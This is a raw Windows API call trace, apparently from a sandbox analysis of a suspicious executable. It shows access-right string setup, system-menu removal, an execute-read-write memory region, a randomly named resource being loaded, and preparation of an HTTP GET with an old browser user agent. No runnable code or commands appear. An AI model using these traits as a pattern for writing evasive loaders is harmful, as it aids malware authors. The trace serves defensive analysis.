[0120.524] SysReAllocStringLen (in: pbstr=0x2addeb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2addeb0*="DESKTOP_JOURNALRECORD") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2addea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2adde90*="DESKTOP_HOOKCONTROL") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2adde80*="DESKTOP_CREATEWINDOW") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2adde70*="DESKTOP_CREATEMENU") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2adde60*="DESKTOP_READOBJECTS") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2adde50*="DESKTOP_ENUMERATE") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2adde40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2adde30*="STANDARD_RIGHTS_WRITE") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2adde20*="STANDARD_RIGHTS_READ") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2adde10*="STANDARD_RIGHTS_ALL") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adde00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2adde00*="DELETE") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2adddf0*="READ_CONTROL") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2addde0*="WRITE_OWNER") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2adddd0*="WRITE_DAC") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2adddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2adddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2adddb0*="WINSTA_READSCREEN") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2addda0*="WINSTA_READATTRIBUTES") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2addd90*="WINSTA_EXITWINDOWS") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2addd80*="WINSTA_ENUMERATE") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2addd70*="WINSTA_ENUMDESKTOPS") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2addd60*="WINSTA_CREATEDESKTOP") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2addd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2addd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2addd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2addd20*="STANDARD_RIGHTS_WRITE") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2addd10*="STANDARD_RIGHTS_READ") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2addd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2addcf0*="READ_CONTROL") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2addce0*="SI_ACCESS_SPECIFIC") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2addcd0*="WRITE_DAC") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2addcc0*="FILE_DELETE") returned 1
[0120.525] SysReAllocStringLen (in: pbstr=0x2addcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2addcb0*="FILE_DELETE_CHILD") returned 1
[0120.526] SetClassLongA (hWnd=0x601e8, nIndex=-14, dwNewLong=65575) returned 0x0
[0120.527] GetSystemMenu (hWnd=0x601e8, bRevert=0) returned 0x501c3
[0120.527] DeleteMenu (hMenu=0x501c3, uPosition=0xf030, uFlags=0x0) returned 1
[0120.527] DeleteMenu (hMenu=0x501c3, uPosition=0xf000, uFlags=0x0) returned 1
[0120.527] DeleteMenu (hMenu=0x501c3, uPosition=0xf010, uFlags=0x0) returned 1
[0120.527] GetCurrentThreadId () returned 0xfd4
[0120.527] ResetEvent (hEvent=0xa0) returned 1
[0120.527] GetCurrentThreadId () returned 0xfd4
[0120.527] GetCurrentThreadId () returned 0xfd4
[0120.527] GetCurrentThreadId () returned 0xfd4
[0120.527] ResetEvent (hEvent=0xa0) returned 1
[0120.527] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x16f014, fWinIni=0x0 | out: pvParam=0x16f014) returned 1
[0120.527] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x16f014, fWinIni=0x0 | out: pvParam=0x16f014) returned 1
[0120.527] GetSystemMetrics (nIndex=49) returned 16
[0120.527] GetSystemMetrics (nIndex=50) returned 16
[0120.527] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x16f05c, fWinIni=0x0 | out: pvParam=0x16f05c) returned 1
[0120.528] IsWindowVisible (hWnd=0x601e8) returned 0
[0120.528] GetCurrentThreadId () returned 0xfd4
[0120.528] VirtualQuery (in: lpAddress=0x2ab1668, lpBuffer=0x16ef2c, dwLength=0x1c | out: lpBuffer=0x16ef2c*(BaseAddress=0x2ab1000, AllocationBase=0x29f0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0120.528] FindResourceA (hModule=0x29f0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2af8990
[0120.528] FindResourceA (hModule=0x29f0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2af8990
[0120.528] LoadResource (hModule=0x29f0000, hResInfo=0x2af8990) returned 0x2aff044
[0120.528] SizeofResource (hModule=0x29f0000, hResInfo=0x2af8990) returned 0xca5
[0120.528] LockResource (hResData=0x2aff044) returned 0x2aff044
[0120.528] GetCurrentThreadId () returned 0xfd4
[0120.528] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x16ece0, fWinIni=0x0 | out: pvParam=0x16ece0) returned 1
[0120.528] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x16ece0, fWinIni=0x0 | out: pvParam=0x16ece0) returned 1
[0120.528] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x16ece0, fWinIni=0x0 | out: pvParam=0x16ece0) returned 1
[0120.528] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x16ece0, fWinIni=0x0 | out: pvParam=0x16ece0) returned 1
[0120.529] GetDC (hWnd=0x0) returned 0x1801089c
[0120.529] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecc4 | out: lptm=0x16ecc4) returned 1
[0120.530] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0120.531] CreateFontIndirectA (lplf=0x16ec7c) returned 0x230a0837
[0120.531] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.531] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecfc | out: lptm=0x16ecfc) returned 1
[0120.531] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.531] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.531] GetSystemMetrics (nIndex=6) returned 1
[0120.531] VirtualAlloc (lpAddress=0x2b14000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b14000
[0120.532] GetDC (hWnd=0x0) returned 0x1801089c
[0120.532] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecc4 | out: lptm=0x16ecc4) returned 1
[0120.532] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.532] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecfc | out: lptm=0x16ecfc) returned 1
[0120.532] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.532] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.532] GetSystemMetrics (nIndex=6) returned 1
[0120.532] GetDC (hWnd=0x0) returned 0x1801089c
[0120.532] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecc4 | out: lptm=0x16ecc4) returned 1
[0120.532] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.532] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecfc | out: lptm=0x16ecfc) returned 1
[0120.532] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.532] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.532] GetSystemMetrics (nIndex=6) returned 1
[0120.533] GetDC (hWnd=0x0) returned 0x1801089c
[0120.533] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecc4 | out: lptm=0x16ecc4) returned 1
[0120.533] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.533] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecfc | out: lptm=0x16ecfc) returned 1
[0120.533] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.533] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.533] GetSystemMetrics (nIndex=6) returned 1
[0120.533] GetDC (hWnd=0x0) returned 0x1801089c
[0120.533] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecd8 | out: lptm=0x16ecd8) returned 1
[0120.533] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.533] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ed10 | out: lptm=0x16ed10) returned 1
[0120.533] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.533] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.533] GetSystemMetrics (nIndex=6) returned 1
[0120.533] GetDC (hWnd=0x0) returned 0x1801089c
[0120.534] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16e9dc | out: lptm=0x16e9dc) returned 1
[0120.534] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.534] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ea14 | out: lptm=0x16ea14) returned 1
[0120.534] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.534] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.534] GetSystemMetrics (nIndex=6) returned 1
[0120.534] GetDC (hWnd=0x0) returned 0x1801089c
[0120.534] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecd8 | out: lptm=0x16ecd8) returned 1
[0120.534] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.534] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ed10 | out: lptm=0x16ed10) returned 1
[0120.534] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.534] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.534] GetSystemMetrics (nIndex=6) returned 1
[0120.539] GetDC (hWnd=0x0) returned 0x1801089c
[0120.539] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16e9dc | out: lptm=0x16e9dc) returned 1
[0120.539] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.539] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ea14 | out: lptm=0x16ea14) returned 1
[0120.539] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.539] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.539] GetSystemMetrics (nIndex=6) returned 1
[0120.539] GetDC (hWnd=0x0) returned 0x1801089c
[0120.539] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecd8 | out: lptm=0x16ecd8) returned 1
[0120.539] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.539] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ed10 | out: lptm=0x16ed10) returned 1
[0120.539] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.539] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.539] GetSystemMetrics (nIndex=6) returned 1
[0120.539] GetDC (hWnd=0x0) returned 0x1801089c
[0120.540] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16e9dc | out: lptm=0x16e9dc) returned 1
[0120.540] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.540] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ea14 | out: lptm=0x16ea14) returned 1
[0120.540] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.540] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.540] GetSystemMetrics (nIndex=6) returned 1
[0120.540] GetDC (hWnd=0x0) returned 0x1801089c
[0120.540] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecc4 | out: lptm=0x16ecc4) returned 1
[0120.540] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.540] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecfc | out: lptm=0x16ecfc) returned 1
[0120.540] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.540] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.540] GetSystemMetrics (nIndex=6) returned 1
[0120.540] GetDC (hWnd=0x0) returned 0x1801089c
[0120.540] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecc4 | out: lptm=0x16ecc4) returned 1
[0120.540] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.541] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecfc | out: lptm=0x16ecfc) returned 1
[0120.541] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.541] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.541] GetSystemMetrics (nIndex=6) returned 1
[0120.541] GetDC (hWnd=0x0) returned 0x1801089c
[0120.541] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecd8 | out: lptm=0x16ecd8) returned 1
[0120.541] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.541] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ed10 | out: lptm=0x16ed10) returned 1
[0120.541] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.541] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.541] GetSystemMetrics (nIndex=6) returned 1
[0120.541] GetDC (hWnd=0x0) returned 0x1801089c
[0120.541] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16e9dc | out: lptm=0x16e9dc) returned 1
[0120.541] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.541] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ea14 | out: lptm=0x16ea14) returned 1
[0120.541] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.541] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.541] GetSystemMetrics (nIndex=6) returned 1
[0120.542] GetDC (hWnd=0x0) returned 0x1801089c
[0120.542] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecd8 | out: lptm=0x16ecd8) returned 1
[0120.542] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.542] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ed10 | out: lptm=0x16ed10) returned 1
[0120.542] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.542] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.542] GetSystemMetrics (nIndex=6) returned 1
[0120.542] GetDC (hWnd=0x0) returned 0x1801089c
[0120.542] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16e9dc | out: lptm=0x16e9dc) returned 1
[0120.542] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.542] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ea14 | out: lptm=0x16ea14) returned 1
[0120.542] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.542] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.542] GetSystemMetrics (nIndex=6) returned 1
[0120.542] GetDC (hWnd=0x0) returned 0x1801089c
[0120.542] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecd8 | out: lptm=0x16ecd8) returned 1
[0120.542] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.542] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ed10 | out: lptm=0x16ed10) returned 1
[0120.542] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.543] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.543] GetSystemMetrics (nIndex=6) returned 1
[0120.543] GetDC (hWnd=0x0) returned 0x1801089c
[0120.543] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16e9dc | out: lptm=0x16e9dc) returned 1
[0120.543] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.543] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ea14 | out: lptm=0x16ea14) returned 1
[0120.543] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.543] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.543] GetSystemMetrics (nIndex=6) returned 1
[0120.543] GetDC (hWnd=0x0) returned 0x1801089c
[0120.543] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecd8 | out: lptm=0x16ecd8) returned 1
[0120.543] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.543] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ed10 | out: lptm=0x16ed10) returned 1
[0120.543] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.543] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.543] GetSystemMetrics (nIndex=6) returned 1
[0120.543] GetDC (hWnd=0x0) returned 0x1801089c
[0120.543] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16e9dc | out: lptm=0x16e9dc) returned 1
[0120.543] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.543] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ea14 | out: lptm=0x16ea14) returned 1
[0120.543] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.543] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.544] GetSystemMetrics (nIndex=6) returned 1
[0120.544] GetDC (hWnd=0x0) returned 0x1801089c
[0120.544] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecc4 | out: lptm=0x16ecc4) returned 1
[0120.544] SelectObject (hdc=0x1801089c, h=0x230a0837) returned 0x18a002e
[0120.544] GetTextMetricsA (in: hdc=0x1801089c, lptm=0x16ecfc | out: lptm=0x16ecfc) returned 1
[0120.544] SelectObject (hdc=0x1801089c, h=0x18a002e) returned 0x230a0837
[0120.544] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.544] GetSystemMetrics (nIndex=6) returned 1
[0120.546] SysReAllocStringLen (in: pbstr=0x2b1f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2b1f388*="GET") returned 1
[0120.546] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.546] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.546] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.546] SysReAllocStringLen (in: pbstr=0x2b1f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2b1f388*="GET") returned 1
[0120.546] SysReAllocStringLen (in: pbstr=0x2b1f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2b1f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0120.546] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x16ed60, lpdwBufferLength=0x16ed64 | out: lpBuffer=0x16ed60, lpdwBufferLength=0x16ed64) returned 1
[0120.587] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x16ed60, dwBufferLength=0x4) returned 1
[0120.587] VirtualFree (lpAddress=0x2b20000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0120.587] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2b16490, cbMultiByte=3, lpWideCharStr=0x16dc98, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0120.587] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.587] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.587] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.587] SysReAllocStringLen (in: pbstr=0x2b1f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2b1f388*="GET") returned 1
[0120.588] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.588] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.588] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0120.588] SysReAllocStringLen (in: pbstr=0x2b1f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2b1f388*="GET") returned 1
[0120.593] GetTextExtentPoint32A (in: hdc=0x1801089c, lpString="0", c=1, psizl=0x16ee54 | out: psizl=0x16ee54) returned 1
[0120.594] IsIconic (hWnd=0x7019e) returned 0
[0120.594] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ee54 | out: lpRect=0x16ee54) returned 1
[0120.594] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.594] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.594] IsIconic (hWnd=0x7019e) returned 0
[0120.594] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed9c | out: lpRect=0x16ed9c) returned 1
[0120.594] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.594] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.594] IsIconic (hWnd=0x7019e) returned 0
[0120.594] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.594] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.594] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.594] IsIconic (hWnd=0x7019e) returned 0
[0120.594] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.594] FlatSB_SetScrollProp (param_1=0x7019e, index=0x200, newValue=0x0, param_4=0) returned 0
[0120.594] GetSysColor (nIndex=20) returned 0xffffff
[0120.594] FlatSB_SetScrollProp (param_1=0x7019e, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0120.594] FlatSB_SetScrollInfo (param_1=0x7019e, code=0, psi=0x16edaa, fRedraw=1) returned 0
[0120.594] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.594] IsIconic (hWnd=0x7019e) returned 0
[0120.594] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.594] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.595] IsIconic (hWnd=0x7019e) returned 0
[0120.595] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.595] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.595] IsIconic (hWnd=0x7019e) returned 0
[0120.595] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.595] FlatSB_SetScrollProp (param_1=0x7019e, index=0x100, newValue=0x0, param_4=0) returned 0
[0120.595] GetSysColor (nIndex=20) returned 0xffffff
[0120.595] FlatSB_SetScrollProp (param_1=0x7019e, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0120.595] FlatSB_SetScrollInfo (param_1=0x7019e, code=1, psi=0x16edaa, fRedraw=1) returned 0
[0120.595] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.595] IsIconic (hWnd=0x7019e) returned 0
[0120.595] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.595] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.595] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.595] IsIconic (hWnd=0x7019e) returned 0
[0120.595] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed9c | out: lpRect=0x16ed9c) returned 1
[0120.595] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.595] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.595] IsIconic (hWnd=0x7019e) returned 0
[0120.595] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.595] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.595] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.595] IsIconic (hWnd=0x7019e) returned 0
[0120.595] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.595] FlatSB_SetScrollProp (param_1=0x7019e, index=0x200, newValue=0x0, param_4=0) returned 0
[0120.595] GetSysColor (nIndex=20) returned 0xffffff
[0120.595] FlatSB_SetScrollProp (param_1=0x7019e, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0120.595] FlatSB_SetScrollInfo (param_1=0x7019e, code=0, psi=0x16edaa, fRedraw=1) returned 0
[0120.596] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.596] IsIconic (hWnd=0x7019e) returned 0
[0120.596] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
[0120.596] GetWindowLongA (hWnd=0x7019e, nIndex=-16) returned 116326400
[0120.596] IsIconic (hWnd=0x7019e) returned 0
[0120.596] GetClientRect (in: hWnd=0x7019e, lpRect=0x16ed6c | out: lpRect=0x16ed6c) returned 1
